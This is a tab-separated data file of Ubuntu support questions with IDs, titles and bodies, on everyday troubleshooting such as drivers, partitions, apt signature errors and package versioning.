91910	how can i copy an ntfs partition to my new machine 's hdd using ubuntu ?	background : got a new laptop recently . got ubuntu working on it and copied everything i needed from my old laptop 's ubuntu installation thusly . however , i had an ntfs partition on my old machine with some data i 'd like to keep . i 've resized this hdd 's partitions to make space for it , but i still have to copy it . if worse comes to worst , i guess i could make a new ntfs partition of the same size with gparted , mount them on both machines , and use ssh/rsync to copy all the files , but there 's probably a better/easier/more efficient way to go about it . i did some google searches to the effect of `` copy ntfs partition over lan , '' but there 's too much out there to process . i try to solve these problems with google when i can , but in this case , i think i 've gotten to the point of needing to ask people directly .
91915	no sound alerts for system events	i have installed ubuntu 11.10 on my inspiron n5030 . initially there were login sounds and all . but after some updates and software installation , now i 'm not getting any alert sounds . however i get sounds when logged in as guest . i do n't know which update worked wrong . i tried almost all solutions that provided in earlier posts ... please help me to solve it ...
91916	ubuntu 11.10 freezes when shutting down	i have ubuntu 11.10 installed on inspiron n5030 . when i try to shutdown/restart from user login menu , it freezes and after a while it shows the user login menu again . this happens only if i have logged in two accounts . even after logging off each , this happens again.please put forward a solution for this ...
91920	is there a canon mg5350 driver cq alternative driver	the canon mg5350 printer comes without a linux driver . probably never will , recording several reactions on fora . itĺ been said that canon will not develop any in the future . is there an alternative driver that will work ?
91921	dual boot , ubuntu wo n't boot !	i tried to install ubuntu using wubi at my pc with windows 7 64bit os . i 've noticed that wubi is downloading ubuntu-11.10-desktop-amd64.iso.torrent but , my pc is intel core i5 , but , i thought that this wo n't be an issue . after wubi finished the installation , i restarted the pc , and chosed ubuntu as an os to start , but , then , nothing happened , i waited too long , all i saw is a blinking cursor at a black screen . any idea ? shall i try to use ubuntu-11.10-desktop-i386.iso.torrent instead ? is there any risk to harm windows 7 booting ?
91922	how does the ubuntu kernel version relate to the upstream version ?	on oneiric , uname -r prints `` 3.0.0-14-generic '' . does this mean that i am running an ubuntu kernel based on the upstream ( linux ) 3.0.0 ? or is it actually based on linux version 3.0.14 ? i have tried cloning the linux kernel repo and adding the ubuntu repo as a remove , but commands like git show-branch ubuntu-3.0.0-14.23 v3.0.14 show these two tags diverging at linux 3.0.4 , and i ca n't see any commits near the tip of the ubuntu tag that indicate a rebase to a new upstream version .
91925	unattended install of firefox extensions	i 'm building a `` generic configuration script '' for our ubuntu installations . coming to firefox there are some cool extensions i wish everyone to have ( firebug , elasticfox-ec2tag and co ... ) . how can i have these extensions installed automatically into the firefox profile ?
91926	how can i install streamster ?	streamster is a software belong to marketiva.com ( forex ) . i read an article here said that he can install streamster on ubuntu 11.10 . the problem is that i did n't find crossover version 7.10 , can someone give me a .dep file of this app , or give me another solution to install streamster ?
91928	how to restore unity 3d ?	recently i used janitor tool to remove unused apps in ubuntu 11.10 . i think i 've removed some unity specific libraries in the process . now my screen look like plane vanila linux desktop without any unity launcher and top panel . even all unity specific effects are also gone . i tried enabling the unity plugin in ccsm and then resetting the unity . i have tried unity -- reset i have tried reinstalling ubuntu-desktop
91929	can i stop kde from making a copy of a file i just overwrote ?	let ' say i overwrite a text file named test.txt in kde . kde will make a copy of the old file and save it as test.txt~ in the same directory . is it possible to disable that ? i make copies of the old files i need , so it 's highly annoying to have every file in two versions .
91932	why does n't adobe flash player 11.x have hardware acceleration ?	i am using ubuntu 11.10 with a nvidia geforce 8600m gt and a nvidia geforce 525m gt ( drivers ; nvidia-current-updates via ubuntu ) . while adobes flash player 11.x was working with full hardware acceleration in ubuntu 11.04 , it has stopped working in ubuntu 11.10 .
91933	how do i make the scanner function of my brother dcp-315cn work ?	i have a networked brother dcp-315cn printer/scanner that i 've been using with ubuntu since version 7.10 . each new version has required its own tricks but so far , i 've always been able to make the machine work - until now with v11.10 . printing is no problem and has just become easier with the years , not even requiring drivers from the brother web pages but the scanning function now leaves me without a clue as to what to do . i 've downloaded and installed brscan2 ( which has n't been updated by brother since 2009 ) and other related drives just as with earlier ubuntu versions . i have also applied the tip about copying a number of files from /usr/lib64 to /usr/lib but to no use . brsaneconfig 2 -q tells me that i 've correctly configured and registered the scanner , and dpkg -l tells me that the drivers are installed but still , no scanner application detects it . scanimage -l , scanimage -t , sane-find-scanner , and brsaneconfig2 -d all state that there is no scanner device connected , which i find very strange since the two computers in the house still running v11.04 sees the scanner , and i can anyway print on the device even from oneiric . any piece of advice that can put me on a forward-moving track would be very much appreciated . update : i 've been playing around with virtualbox on two different computers , testing both 32-bit and 64-bit versions of ubuntu . so far , the conclusion is that this problem is specific to the 64-bit version of 11.10 . 32-bit or earlier versions of ubuntu work fine with the scanner . as to the reason for the problem , i 'm no wiser , however . update : more playing with virtualbox . scanning works with 64-bit fedora 16 ( recent kernel ) and debian 6 ( old kernel ) , but so far not with ubuntu-based mint 12 . so the problem seems to be kind of ubuntuish up to now . going to try opensuse as well .
91938	how can one invoke lg ( looking glass ) from a command line ?	i had asked another question which is related . i know that i can invoke lg ( looking glass ) via the gnome-shell `` run application '' window ( by pressing alt+f2 ) . what i 'd like to know is how to do this from a command line ? for example , if i wanted to pop up the looking glass from a shell script , how would i do it ? ( my other question )
91939	x opens local firefox instead of distant one	i usually use vinagre or vncviewer to work from home , but since my screen size is not the same on both computers ( ubuntu on laptop , fedora in the office ) it 's not comfortable at all . i 'm currently trying to use x , but when i use it to open firefox4 it opens the local version , which is not good for me ( i want to have access to articles so i need the university 's ip ) . how can i fix this ? better yet , is there a good remote desktop viewer that dose n't care about different screen sizes ?
91942	replace commas with colons and move all values to one line	i entered a list of number in calc and saved it as csv so that all the values on one line are separated by commas . i will describe what i 'm seeking with bash in the following example : input 22,33 45,533 output 22:33,45:533
91943	after compiz configuration edited	i edit compiz configuration with ccsm and after that my ubuntu will go to must os ! when i open tabs in chrome or firefox them use many usage of cpu and cpu fan start to work hardly ! i delete these files from my home folder but does n't effect ! sudo rm -rf .compiz-1 .gconf .gnome2 .gnome how can i restart compiz effects and bring ubuntu before compiz changes ? here is the output of top :
91945	no_pubkey and badsig signature errors when updating	i am unable to update my ubuntu 11.10 and this what appears on my terminal ign http : //ppa.launchpad.net oneiric inrelease ign http : //ppa.launchpad.net oneiric inrelease ign http : //ppa.launchpad.net oneiric inrelease ign http : //extras.ubuntu.com oneiric inrelease ign http : //archive.canonical.com oneiric inrelease ign http : //security.ubuntu.com oneiric-security inrelease ign http : //eg.archive.ubuntu.com oneiric inrelease ign http : //eg.archive.ubuntu.com oneiric-updates inrelease ign http : //eg.archive.ubuntu.com oneiric-backports inrelease ign http : //ppa.launchpad.net oneiric inrelease ign http : //ppa.launchpad.net oneiric inrelease ign http : //ppa.launchpad.net oneiric inrelease ign http : //dl.google.com stable inrelease get:1 http : //extras.ubuntu.com oneiric release.gpg [ 72 b ] get:2 http : //ppa.launchpad.net oneiric release.gpg [ 316 b ] ign http : //dl.google.com stable inrelease hit http : //archive.canonical.com oneiric release.gpg get:3 http : //eg.archive.ubuntu.com oneiric release.gpg [ 198 b ] hit http : //extras.ubuntu.com oneiric release get:4 http : //ppa.launchpad.net oneiric release.gpg [ 316 b ] get:5 http : //ppa.launchpad.net oneiric release.gpg [ 316 b ] get:6 http : //ppa.launchpad.net oneiric release.gpg [ 316 b ] err http : //extras.ubuntu.com oneiric release hit http : //eg.archive.ubuntu.com oneiric-updates release.gpg get:7 http : //dl.google.com stable release.gpg [ 198 b ] hit http : //archive.canonical.com oneiric release get:8 http : //ppa.launchpad.net oneiric release.gpg [ 316 b ] get:9 http : //ppa.launchpad.net oneiric release.gpg [ 316 b ] hit http : //eg.archive.ubuntu.com oneiric-backports release.gpg hit http : //archive.canonical.com oneiric/partner amd64 packages hit http : //ppa.launchpad.net oneiric release ign http : //ppa.launchpad.net oneiric release hit http : //ppa.launchpad.net oneiric release ign http : //ppa.launchpad.net oneiric release hit http : //ppa.launchpad.net oneiric release ign http : //ppa.launchpad.net oneiric release hit http : //ppa.launchpad.net oneiric release ign http : //ppa.launchpad.net oneiric release get:10 http : //dl.google.com stable release.gpg [ 198 b ] hit http : //eg.archive.ubuntu.com oneiric release hit http : //archive.canonical.com oneiric/partner i386 packages ign http : //archive.canonical.com oneiric/partner translationindex ign http : //eg.archive.ubuntu.com oneiric release hit http : //ppa.launchpad.net oneiric release ign http : //ppa.launchpad.net oneiric release hit http : //eg.archive.ubuntu.com oneiric-updates release get:11 http : //dl.google.com stable release [ 1,347 b ] hit http : //eg.archive.ubuntu.com oneiric-backports release ign http : //eg.archive.ubuntu.com oneiric/main sources/diffindex ign http : //eg.archive.ubuntu.com oneiric/restricted sources/diffindex ign http : //eg.archive.ubuntu.com oneiric/universe sources/diffindex ign http : //eg.archive.ubuntu.com oneiric/multiverse sources/diffindex hit http : //security.ubuntu.com oneiric-security release.gpg ign http : //eg.archive.ubuntu.com oneiric/main amd64 packages/diffindex ign http : //eg.archive.ubuntu.com oneiric/restricted amd64 packages/diffindex ign http : //eg.archive.ubuntu.com oneiric/universe amd64 packages/diffindex ign http : //eg.archive.ubuntu.com oneiric/multiverse amd64 packages/diffindex ign http : //eg.archive.ubuntu.com oneiric/main i386 packages/diffindex get:12 http : //dl.google.com stable release [ 1,347 b ] hit http : //security.ubuntu.com oneiric-security release ign http : //eg.archive.ubuntu.com oneiric/restricted i386 packages/diffindex ign http : //eg.archive.ubuntu.com oneiric/universe i386 packages/diffindex ign http : //eg.archive.ubuntu.com oneiric/multiverse i386 packages/diffindex hit http : //eg.archive.ubuntu.com oneiric/main translationindex hit http : //eg.archive.ubuntu.com oneiric/multiverse translationindex hit http : //eg.archive.ubuntu.com oneiric/restricted translationindex hit http : //eg.archive.ubuntu.com oneiric/universe translationindex hit http : //eg.archive.ubuntu.com oneiric-updates/main sources hit http : //eg.archive.ubuntu.com oneiric-updates/restricted sources hit http : //eg.archive.ubuntu.com oneiric-updates/universe sources hit http : //security.ubuntu.com oneiric-security/main sources get:13 http : //dl.google.com stable/main amd64 packages [ 1,201 b ] get:14 http : //dl.google.com stable/main i386 packages [ 1,214 b ] hit http : //eg.archive.ubuntu.com oneiric-updates/multiverse sources hit http : //eg.archive.ubuntu.com oneiric-updates/main amd64 packages hit http : //eg.archive.ubuntu.com oneiric-updates/restricted amd64 packages hit http : //eg.archive.ubuntu.com oneiric-updates/universe amd64 packages hit http : //eg.archive.ubuntu.com oneiric-updates/multiverse amd64 packages ign http : //dl.google.com stable/main translationindex hit http : //security.ubuntu.com oneiric-security/restricted sources hit http : //security.ubuntu.com oneiric-security/universe sources hit http : //security.ubuntu.com oneiric-security/multiverse sources hit http : //security.ubuntu.com oneiric-security/main amd64 packages hit http : //security.ubuntu.com oneiric-security/restricted amd64 packages hit http : //eg.archive.ubuntu.com oneiric-updates/main i386 packages hit http : //eg.archive.ubuntu.com oneiric-updates/restricted i386 packages hit http : //eg.archive.ubuntu.com oneiric-updates/universe i386 packages hit http : //eg.archive.ubuntu.com oneiric-updates/multiverse i386 packages hit http : //eg.archive.ubuntu.com oneiric-updates/main translationindex hit http : //ppa.launchpad.net oneiric release ign http : //ppa.launchpad.net oneiric/main sources/diffindex ign http : //ppa.launchpad.net oneiric release ign http : //ppa.launchpad.net oneiric/main amd64 packages/diffindex ign http : //ppa.launchpad.net oneiric/main i386 packages/diffindex hit http : //security.ubuntu.com oneiric-security/universe amd64 packages hit http : //security.ubuntu.com oneiric-security/multiverse amd64 packages hit http : //security.ubuntu.com oneiric-security/main i386 packages hit http : //security.ubuntu.com oneiric-security/restricted i386 packages hit http : //security.ubuntu.com oneiric-security/universe i386 packages hit http : //security.ubuntu.com oneiric-security/multiverse i386 packages hit http : //security.ubuntu.com oneiric-security/main translationindex hit http : //security.ubuntu.com oneiric-security/multiverse translationindex hit http : //security.ubuntu.com oneiric-security/restricted translationindex hit http : //security.ubuntu.com oneiric-security/universe translationindex ign http : //ppa.launchpad.net oneiric/main translationindex ign http : //ppa.launchpad.net oneiric/main sources/diffindex ign http : //ppa.launchpad.net oneiric/main amd64 packages/diffindex ign http : //ppa.launchpad.net oneiric/main i386 packages/diffindex ign http : //ppa.launchpad.net oneiric/main translationindex ign http : //ppa.launchpad.net oneiric/main sources/diffindex hit http : //eg.archive.ubuntu.com oneiric-updates/multiverse translationindex hit http : //eg.archive.ubuntu.com oneiric-updates/restricted translationindex hit http : //eg.archive.ubuntu.com oneiric-updates/universe translationindex hit http : //eg.archive.ubuntu.com oneiric/main sources hit http : //eg.archive.ubuntu.com oneiric/restricted sources hit http : //security.ubuntu.com oneiric-security/main translation-en hit http : //eg.archive.ubuntu.com oneiric/universe sources hit http : //eg.archive.ubuntu.com oneiric/multiverse sources hit http : //eg.archive.ubuntu.com oneiric-backports/main sources hit http : //eg.archive.ubuntu.com oneiric-backports/restricted sources hit http : //eg.archive.ubuntu.com oneiric-backports/universe sources hit http : //security.ubuntu.com oneiric-security/multiverse translation-en hit http : //security.ubuntu.com oneiric-security/restricted translation-en hit http : //eg.archive.ubuntu.com oneiric-backports/multiverse sources hit http : //eg.archive.ubuntu.com oneiric-backports/main amd64 packages hit http : //eg.archive.ubuntu.com oneiric-backports/restricted amd64 packages hit http : //eg.archive.ubuntu.com oneiric-backports/universe amd64 packages hit http : //eg.archive.ubuntu.com oneiric-backports/multiverse amd64 packages hit http : //eg.archive.ubuntu.com oneiric-backports/main i386 packages hit http : //eg.archive.ubuntu.com oneiric-backports/restricted i386 packages hit http : //eg.archive.ubuntu.com oneiric-backports/universe i386 packages hit http : //eg.archive.ubuntu.com oneiric-backports/multiverse i386 packages hit http : //eg.archive.ubuntu.com oneiric-backports/main translationindex ign http : //archive.canonical.com oneiric/partner translation-en_us ign http : //ppa.launchpad.net oneiric/main amd64 packages/diffindex ign http : //ppa.launchpad.net oneiric/main i386 packages/diffindex ign http : //ppa.launchpad.net oneiric/main translationindex get:15 http : //dl.google.com stable/main amd64 packages [ 748 b ] get:16 http : //dl.google.com stable/main i386 packages [ 765 b ] ign http : //dl.google.com stable/main translationindex ign http : //archive.canonical.com oneiric/partner translation-en ign http : //ppa.launchpad.net oneiric/main sources/diffindex ign http : //ppa.launchpad.net oneiric/main amd64 packages/diffindex ign http : //ppa.launchpad.net oneiric/main i386 packages/diffindex ign http : //ppa.launchpad.net oneiric/main translationindex ign http : //ppa.launchpad.net oneiric/main sources/diffindex hit http : //security.ubuntu.com oneiric-security/universe translation-en ign http : //ppa.launchpad.net oneiric/main amd64 packages/diffindex ign http : //ppa.launchpad.net oneiric/main i386 packages/diffindex ign http : //ppa.launchpad.net oneiric/main translationindex hit http : //ppa.launchpad.net oneiric/main sources ign http : //ppa.launchpad.net oneiric/main sources/diffindex ign http : //ppa.launchpad.net oneiric/main amd64 packages/diffindex ign http : //ppa.launchpad.net oneiric/main i386 packages/diffindex ign http : //ppa.launchpad.net oneiric/main translationindex hit http : //ppa.launchpad.net oneiric/main amd64 packages hit http : //ppa.launchpad.net oneiric/main i386 packages hit http : //eg.archive.ubuntu.com oneiric-backports/multiverse translationindex hit http : //eg.archive.ubuntu.com oneiric-backports/restricted translationindex hit http : //eg.archive.ubuntu.com oneiric-backports/universe translationindex hit http : //ppa.launchpad.net oneiric/main sources hit http : //ppa.launchpad.net oneiric/main amd64 packages hit http : //ppa.launchpad.net oneiric/main i386 packages hit http : //ppa.launchpad.net oneiric/main sources hit http : //ppa.launchpad.net oneiric/main amd64 packages hit http : //ppa.launchpad.net oneiric/main i386 packages hit http : //eg.archive.ubuntu.com oneiric/main amd64 packages hit http : //eg.archive.ubuntu.com oneiric/restricted amd64 packages hit http : //eg.archive.ubuntu.com oneiric/universe amd64 packages hit http : //eg.archive.ubuntu.com oneiric/multiverse amd64 packages hit http : //eg.archive.ubuntu.com oneiric/main i386 packages hit http : //eg.archive.ubuntu.com oneiric/restricted i386 packages hit http : //eg.archive.ubuntu.com oneiric/universe i386 packages hit http : //eg.archive.ubuntu.com oneiric/multiverse i386 packages hit http : //ppa.launchpad.net oneiric/main sources hit http : //ppa.launchpad.net oneiric/main amd64 packages hit http : //ppa.launchpad.net oneiric/main i386 packages hit http : //eg.archive.ubuntu.com oneiric/main translation-en hit http : //eg.archive.ubuntu.com oneiric/multiverse translation-en hit http : //eg.archive.ubuntu.com oneiric/restricted translation-en hit http : //eg.archive.ubuntu.com oneiric/universe translation-en hit http : //ppa.launchpad.net oneiric/main sources hit http : //ppa.launchpad.net oneiric/main amd64 packages hit http : //ppa.launchpad.net oneiric/main i386 packages hit http : //eg.archive.ubuntu.com oneiric-updates/main translation-en hit http : //eg.archive.ubuntu.com oneiric-updates/multiverse translation-en hit http : //eg.archive.ubuntu.com oneiric-updates/restricted translation-en hit http : //eg.archive.ubuntu.com oneiric-updates/universe translation-en hit http : //eg.archive.ubuntu.com oneiric-backports/main translation-en hit http : //ppa.launchpad.net oneiric/main sources hit http : //ppa.launchpad.net oneiric/main amd64 packages hit http : //ppa.launchpad.net oneiric/main i386 packages hit http : //eg.archive.ubuntu.com oneiric-backports/multiverse translation-en hit http : //eg.archive.ubuntu.com oneiric-backports/restricted translation-en hit http : //eg.archive.ubuntu.com oneiric-backports/universe translation-en ign http : //dl.google.com stable/main translation-en_us ign http : //dl.google.com stable/main translation-en ign http : //dl.google.com stable/main translation-en_us ign http : //dl.google.com stable/main translation-en ign http : //ppa.launchpad.net oneiric/main translation-en_us ign http : //ppa.launchpad.net oneiric/main translation-en ign http : //ppa.launchpad.net oneiric/main translation-en_us ign http : //ppa.launchpad.net oneiric/main translation-en ign http : //ppa.launchpad.net oneiric/main translation-en_us ign http : //ppa.launchpad.net oneiric/main translation-en ign http : //ppa.launchpad.net oneiric/main translation-en_us ign http : //ppa.launchpad.net oneiric/main translation-en ign http : //ppa.launchpad.net oneiric/main translation-en_us ign http : //ppa.launchpad.net oneiric/main translation-en ign http : //ppa.launchpad.net oneiric/main translation-en_us ign http : //ppa.launchpad.net oneiric/main translation-en fetched 9,184 b in 9s ( 939 b/s ) reading package lists ... done w : a error occurred during the signature verification . the repository is not updated and the previous index files will be used . gpg error : http : //extras.ubuntu.com oneiric release : the following signatures were invalid : badsig 16126d3a3e5c1192 ubuntu extras archive automatic signing key < ftpmaster @ ubuntu.com > w : gpg error : http : //ppa.launchpad.net oneiric release : the following signatures could n't be verified because the public key is not available : no_pubkey b725097b3acc3965 w : gpg error : http : //ppa.launchpad.net oneiric release : the following signatures could n't be verified because the public key is not available : no_pubkey d6b6db186a68f637 w : gpg error : http : //ppa.launchpad.net oneiric release : the following signatures could n't be verified because the public key is not available : no_pubkey 187206a44933b6ab w : gpg error : http : //ppa.launchpad.net oneiric release : the following signatures could n't be verified because the public key is not available : no_pubkey 6d3b959722e58263 w : gpg error : http : //eg.archive.ubuntu.com oneiric release : the following signatures were invalid : badsig 40976eaf437d05b5 ubuntu archive automatic signing key < ftpmaster @ ubuntu.com > w : gpg error : http : //ppa.launchpad.net oneiric release : the following signatures could n't be verified because the public key is not available : no_pubkey 464ad83d4631bbea w : gpg error : http : //ppa.launchpad.net oneiric release : the following signatures could n't be verified because the public key is not available : no_pubkey c2518248eea14886 w : failed to fetch http : //extras.ubuntu.com/ubuntu/dists/oneiric/release w : some index files failed to download . they have been ignored , or old ones used instead .
91953	how to `` get '' system proxy settings ?	i want to set proxy in my system firefox from firefox that i use by vpn . in vpn 's firefox in preferences/advanced/network/settings the checkbox '' use system proxy settings '' is checked . where are system proxy settings definded ?
91956	what package do i use to replace dkim-filter ?	it looks like dkim-filter is no longer in the repositories as of natty ... what package should i install if i want to add dkim support to postfix ?
91959	why does vlc media player uninstall when zsnes is installed through terminal ?	when i try to install zsnes vlc is being uninstalled and the other way round . i do n't want to make any changes to them whenever i do the installation . does anyone know why this is happening ?
91960	bluetooth connection reconnecting problem with all samsung phones !	i have samsung corby 2 s3850 and galaxy s2 . both phone have same bluetooth problem . in ubuntu 11.10 , when i trying to connect my phone using `` dun '' it connects for first time . but after disconnecting it , when i trying to reconnect it shows permission error ( 13 ) problem . all most samsung phones have the same problem . `` is there any solution for this problem . '' b_cuz i love ubuntu very much ! '' the great free operating system for human beings ! ``
91962	usb mobile broadbands on ubuntu 11.10	this is really a weird problem , it seems that mobile broadbands can be recognized only by the live/live-install version on the usb/cd but can not be recognized on the installed system ! i tested it on 2 different computers `` laptops '' ( hp/asus ) with 2 different usb broadbands ( huawei/alcatel ) details : no broadband connection type is detected even with manually adding connections no problems on the live version ( iso -- > usb ) ! system : ubuntu 11.10 x64amd just installed currently * laptop1 : asus f8sn , cpu : intel core 2due 2.4ghz t8300 penryn santarosa usb:2.0 vga : nvidia 9500m gs motherboard : asus f8000 , intel chipset , intel bus * laptop2 : hp pavilion dv 2550 special ed , cpu:1.5 core 2due , usb:2.0 motherboard : intel usb mobile broadband 1 : huawei , vid/pid : 12d1 / 140c .. this one worked on both computers so far but not always , mostly it is not recognized usb mobile broadband 2 : alcatel , model : x060s .. this one never worked on both computers `` except on live boot ( usb/cd ) both broadbands are always recognized '' how strange is that ! it seems ( from internet search ) that this problem is common to all broadband users with no complete solution and it must be solved permanently
91967	libraries for eclipse with ccsv5 from texas instruments	my system is ubuntu 11.10 64bit and i have to run a 32bit version of eclipse to use the ti plugins for ccsv5 but it does n't work . i tried to run eclipse in a 62bit java environment but it does n't even start . now i got `` java version `` 1.6.0_30 '' '' from sun in 32bit and now eclipse starts but ca n't use the ti plug ins and i get the following errors in bash : /usr/lib/gtk-2.0/2.10.0/menuproxies/libappmenu.so : falsche elf-klasse : elfclass64 /usr/lib/gio/modules/libgvfsdbus.so : falsche elf-klasse : elfclass64 failed to load module : /usr/lib/gio/modules/libgvfsdbus.so and this in a popup-window when itry to use the plugin : the selected wizard could not be started . plug-in com.ti.ccstudio.project.ui was unable to load class com.ti.ccstudio.project.ui.internal.wizards.importexport.temp.externalprojectimportwizard . an error occurred while automatically activating bundle com.ti.ccstudio.project.ui ( 352 ) . t tested the libraries with file : /usr/lib/gio/modules/libgvfsdbus.so : elf 64-bit lsb shared object , x86-64 , version 1 ( sysv ) , dynamically linked , stripped /usr/lib/gtk-2.0/2.10.0/menuproxies/libappmenu.so : elf 64-bit lsb shared object , x86-64 , version 1 ( sysv ) , dynamically linked , stripped the ia32-libs are installed .
91968	11.10 install on eeepc 1001ha locks up at 'configuring keyboard '	my eeepc runs mint 10 satisfactorily ( using generic pc105 keymap ) , but will not upgrade ; so tried fresh installs of mint 11 & 12 and ubuntu 11.10 from cd/dvd .iso 's . all versions lock up either at keyboard mapping stage or with ubuntu at configuring stage . standard uk keyboard settings . curiously my keyboard has an additional symbol on the 'u ' , 'i ' , 'o ' , and 'a ' keys being these letters with an acute accent above them . these symbols do not appear to print nor are they mentioned in any documents ( or the 'define your keyboard ' option ) -do i have a non-standard ( mid-european ? ) keyboard ? tried uk intl with dead keys . how do i work round this ? ubuntu will not run from disc -simply cycles back to start up , although mint variants do work from their disks . i am fairly new to linux .
91974	allow a remote control to work while on lock screen	i 'm looking for a solution to the following problem . i use a remote control to pause/skip music that i am playing in banshee , and this works well . however , when my computer locks , due to inactivity , the remote control no longer works . does anyone know of a way to fix this problem ? i believe the remote control simply triggers specific keyboard buttons to be pressed , which handle that action . is there a program that can run in the background which could do this ? i still would really like my computer to lock after a period of inactivity . thank you .
91983	how do i remove ubuntu one-synched files from my computer without deleting them on the server ?	i have been trying to sync all my documents on ubuntu one on one ubuntu lucid system and one windows xp computer . my trouble starts when ubuntu one sync deleted folders i deleted from one computer from the server and when i opened the other it deleted that too . my files are gone forever . how do i fix this from happening again ? i have seen that is coming when i see the sync on one computer removed the files from server , i got copy by chance . but there are some files lost before i could back up the whole folder .
91985	difficulty trying to mount an iso file `` mount : you must specify the filesystem type ''	i have an .iso file which i would like to mount . i have made a folder in /mnt/iso as a mount point . now i try : sudo mount -o loop filename.iso /mnt/iso and the reply is : mount : you must specify the filesystem type and the folder of /mnt/iso is empty . i have tried using sudo mount -o loop -t ext4 filename.iso /mnt/iso it says that mount : wrong fs type , bad option , bad superblock on /dev/loop0 , missing codepage or helper program , or other error ( and more text ) ... i found the filesystem type from using df -t and mount at the command line . what could be missing or wrong ?
91997	will i have the option of allowing dual boot during installation ?	heard about this , and immediately decided to get ubuntu . i 'm not interested in running ubuntu alongside windows , 'cause yeah . i just had one doubt , i 'm currently downloading ubuntu 11.10 32 bit . i 've seen around the internet , that there 's an option to dual boot . i 've never done any of this in my life , and obviously , first time chills . so when i download ubuntu , i understand i 'm supposed to put it on a cd or a usb ? then try out this cd , etc etc etc . the question is , in all of this process , will i ever have the option of allowing dual boot ? or do i have to go around downloading what i see is called `` wubi '' too ? deeply appreciated . one more minor thing , after installing ubuntu and living happily ever after , will everything i have currently in my laptop get deleted ? pictures , data , games , everything ? or transformed to be supported on ubuntu ? thanks , if answered . happy new year !
91999	powerxpress error with driver catalyst . how can i fix it ?	i have install ubuntu 11.10 64bit on my hp dv6-3150el . my notebook has two graphics cards : lspci | grep vga 00:02.0 vga compatible controller : intel corporation core processor integrated graphics controller ( rev 02 ) 01:00.0 vga compatible controller : ati technologies inc madison [ amd radeon hd 5000m series ] i tried to install the proprietary graphics drivers ''fglrx '' available in `` additional drivers '' , which does not give me 3d graphics acceleration ( and i ca n't install those post-release ) . then i can try to download and install from the website ( i tried the version that catalyst 11.8 11.12 ) . the installation goes perfectly ( i followed this guide and others ) , except that when i configure xorg.conf file : sudo aticonfig -- initial powerxpress error : can not stat '/usr/lib64/fglrx ' : no such file or directory failed to initialize libglx for discrete gpu
92004	ltsp + ad integration	i have a windows ad environment with user profiles having homedirs in windows . now i have setup an ubuntu ltsp server ( 10.04.3 - installed via ubuntu-alternate 64bit ) my target was to integrate both these environments , have a single sign-on feature and having their homedirs mapped in linux as well . for this purpose i came across this tutorial http : //math.univ-lille1.fr/~hafidi/t ... n_windows.html this exactly suites the kind of environment that i have . however in this tutorial , i am stuck at step no . 5.2.2 it says to run authconfig i do n't know what they are referring to here . i have auth-config-server and auth-config-client installed on ubuntu but still running just authconfig in terminal does n't work . am i missing something here ? please help me out . if there are any other robust free solutions , please also let me know . thank you .
92007	ubuntu upgrade of firefox 9 in ubuntu 11.10	when or will firefox 9 be updated in ubuntu 11.10 ?
92008	fan does n't work on an acer aspire 5315	i have recently installed lubuntu 11.10 on my old laptop ( acer aspire 5315 celeron ) and observed that fan is not working properly on lubuntu side.i find it strange that it is working perfectly under window vista . how could i solve this problem ?
92014	how can i create a live usb with persistant storage that will run on a macbook air without using refit ?	sometimes i have to use a macbook air ( 2,1 ) at work . i 'd like to be able to have an ubuntu usb stick with persistent storage space for it , that does not require any modification of the machine 's internal drive . so , that i can work in my normal ( k ) ubuntu environment on the machine and save stuff onto the stick . i do n't want to install refit or anything , since i am not to the only other of this machine . how can i achieve this ? i know that there is a grub 2 version that supports efi , which should do the trick in principle , but what are the necessary steps to get it working ? are there alternatives to this ?
92017	help with creating custom shortcut	i am using emesene and when i click on the close bottom it does not quit the messenger which is great it goes into the mail icon on the top panel and i can open it again with clicking on the emesene icon , how can i create a custom shortcut to open the running emesene again ? instead of clicking it edit : i mean i could press `` super + e '' to open the main emesene window again just like if i clicked on the icon inside the mail icon on the top panel and do n't open a new emesene window so i have to login again .
92018	swapping function and special keys on hp pavilion dv6 ?	on my hp pavilion laptop i have to press an additional fn key and the corresponding function key to get a function key , e.g . fn+f3 works as f3 , f3 alone only increases the brightness of the screen . is there any way to swap the key behaviour , like described here for function keys in apple keyboard do n't work as expected
92019	how to install specific ubuntu packages , with exact version ?	i want to setup a new virtual machine with some specified packages ( name and version ) , that are provided . for example apache2 in version 2.2.20-1ubuntu1 with all dependencies . even if there is a new version of this package on the servers this one should be installed . the solution has to work / scale with multiple ( n ) `` setups '' . another virtual machine might need an older version of apache2 . i currently know of some possibilities that install the exact packages , but do not scale that good : copy all required *.deb to every virtual machine manually and enter : dpkg -i ... - > could work , but it is very error prone . ( manual scripts etc . ) create and use a new ubuntu repository for each setup . - > does not work because i would need n repositories . setup the machine once and copy the vm / create a snapshot . - > does not work because i would need to store n vms . my problem could be labeled as patch management , but i do not want to update my packages to the current version . my goal is to install old packages .
92023	getting screen blanking working with ubuntu 11.10 under unity	i want screen blanking after 10 or 30 minutes , but at present the screen does n't blank at all . this has been an issue since upgrading to 11.10 . at present , even after a couple of hours , the screen does n't blank , even though in the screen lock settings it is set to go off after 10 minutes . i ca n't find any good source of information as to how to troubleshoot the screen blanking / screen saver system in unity . output of gsettings list-recursively | grep `` ( power sleep-display\|power active ) '' ( process:3261 ) : glib-critical ** : g_strv_length : assertion `str_array ! = null ' failed ( process:3261 ) : glib-critical ** : g_strv_length : assertion `str_array ! = null ' failed org.gnome.settings-daemon.plugins.power active true org.gnome.settings-daemon.plugins.power sleep-display-ac 60 org.gnome.settings-daemon.plugins.power sleep-display-battery 60 for reference , process 3261 is the gsettings process the machine is a sony vaio vpceb1z0e , i5-430m , 4gb ram , amd graphics
92024	how to set up a basic home network file sharing ?	i have 3 machines , all on ubuntu 10.10 2 desktops wired to a router , and one laptop via wifi i am using ubuntu for 3 years now , but not yet feeling comfortable using the terminal . how do i set up a basic home network ( graphically ? ) so i can access files from all machines , without been depended on the internet ( like ubuntu one ) *internet connection in my area is not stable ) i had enough copy-paste files using a jump-drive ... thanks .
92033	is there a way to open drm protected books ?	is there a way to open a drm protected book that i have purchased in ubuntu 11.10 64bit . i also have calibre installed .
